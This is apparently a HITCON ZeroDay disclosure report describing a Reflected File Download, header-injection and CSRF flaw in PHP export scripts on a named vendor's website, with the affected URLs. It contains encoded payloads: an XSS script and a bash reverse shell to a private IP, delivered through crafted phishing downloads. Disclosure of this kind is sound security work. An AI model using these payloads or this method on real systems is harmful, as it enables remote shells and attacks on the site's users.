岱宇國際股份有限公司 白箱測試 - Reflected File Download (RFD) via Header Injection(Content-Type) + CSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00829
  •  發信 Vendor: 岱宇國際股份有限公司
  • Title: 岱宇國際股份有限公司 白箱測試 - Reflected File Download (RFD) via Header Injection(Content-Type) + CSRF
  • Introduction: 攻擊者可透過 HTTP Header 注入 操縱請求響應內容,結合 CSRF 手法繞過瀏覽器保護機制,讓受害者從信任的網站下載惡意腳本

處理狀態

目前狀態

公開
Last Update : 2026/08/10
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2026/06/10 01:13:21 : 新提交 (由 阿文 更新此狀態)
  • 2026/06/10 12:54:26 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/02 17:31:01 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/02 17:31:01 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/10 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00829
  • 通報者:littlebabywen (阿文)
  • 風險:高
  • 類型:HTTP Header 注入 (HTTP Header Injection)

參考資料

攻擊者可經由該漏洞將受害者導向至惡意網站或是進行其他攻擊。

漏洞說明: OWASP - Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)

漏洞說明: HTTP Header Injection
https://www.gracefulsecurity.com/http-header-injection/
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://po.dyaco.com/iron/telerik/wrappers/php/pivotgrid/pdf-export.php?type=save

http://po.dyaco.com/iron/telerik/wrappers/php/grid/pdf-export.php?type=save

敘述

  1. 根據 ZD-2026-00828 通報,可以發現該單位有使用 Kendo UI PHP Wrapper 第三方套件,查看了版本會發現是 2016 年舊版套件,可以預估會有一些風險發現。

  2. http://po.dyaco.com/iron/telerik/wrappers/php/ 此資源路徑也顯示了所有套件之原始碼。
    圖片

  3. 這邊白箱分析舉例 "http://po.dyaco.com/iron/telerik/wrappers/php/pivotgrid/pdf-export.php" 擁有 Reflected File Download (RFD) + Header Injection(Content-Type) 之風險,以下為 pdf-export.php 之原始碼。
    圖片

  4. 可以發現對於欄位 fileName、contentType、base64 沒有任何檢查機制和信任來源,利用 burp suite 可構造此資源的請求,攻擊者藉由 "http://po.dyaco.com/iron/telerik/wrappers/php/pivotgrid/pdf-export.php?type=save" 執行 POST 請求,並且構造 "fileName=&contentType=&base64=" 參數,contentType 可指定任何文件類型,base64 可以指定任何程式語言語法,包含 javascript、windows shell、linux shell 語法等讓受害者從合法信任的網站下載惡意腳本。

  5. 舉例一 : Javascript 語法 - 可導致 XSS 攻擊。
    fileName=xss.html&contentType=text/html&base64=%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%57%46%4e%54%49%46%42%50%51%79%63%70%50%43%39%7a%59%33%4a%70%63%48%51%2b
    圖片

  6. 舉例二 : Linux shell 指令 - 可導致受害者下載惡意腳本
    fileName=aaa.sh&contentType=application/x-sh&base64=%59%6d%46%7a%61%43%41%74%59%79%41%69%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%51%31%4c%6a%45%33%4e%53%38%30%4e%44%51%30%49%44%41%2b%4a%6a%45%69
    圖片

  7. 此資源因為沒有 set-cookie 機制跟防範 Origin 或 Referer 標頭,即擁有 CSRF 風險,攻擊者就可以利用上述風險自製一個釣魚連結,誘使受害者去下載惡意檔案、惡意腳本。
    (這邊利用 Burp CSRF PoC 客製化釣魚連結)
    圖片
    圖片
    圖片

  8. 也可以指定下載 .sh 檔案。
    圖片
    圖片

  9. http://po.dyaco.com/iron/telerik/wrappers/php/grid/pdf-export.php?type=save 這支資源也有上述風險,就不再舉例。

修補建議

1. 若 Kendo UI PHP Wrapper 此地三方套件沒再使用的話,請盡速移除,或尋找更多穩定安全的第三方套件。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;